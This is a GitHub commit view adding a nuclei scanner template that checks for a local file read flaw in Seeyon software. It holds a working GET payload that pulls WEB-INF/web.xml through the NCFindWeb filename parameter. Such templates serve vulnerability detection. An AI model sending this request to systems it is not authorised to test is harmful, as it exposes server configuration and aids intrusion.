Merge pull request #1332 from projectdiscovery/princechaddha-patch-2

Create WooYun-2015-148227.yaml
patch-1
Prince Chaddha 2021-04-28 18:51:07 +05:30 committed by GitHub
commit a55db7af44
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 25 additions and 0 deletions

View File

@ -0,0 +1,25 @@
id: WooYun-2015-148227
info:
name: Seeyon WooYun LFR
author: princechaddha
severity: high
reference: https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html
tags: seeyon,wooyun,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<servlet-name>NCInvokerServlet</servlet-name>"
part: body
- type: word
part: header
words:
- "application/xml"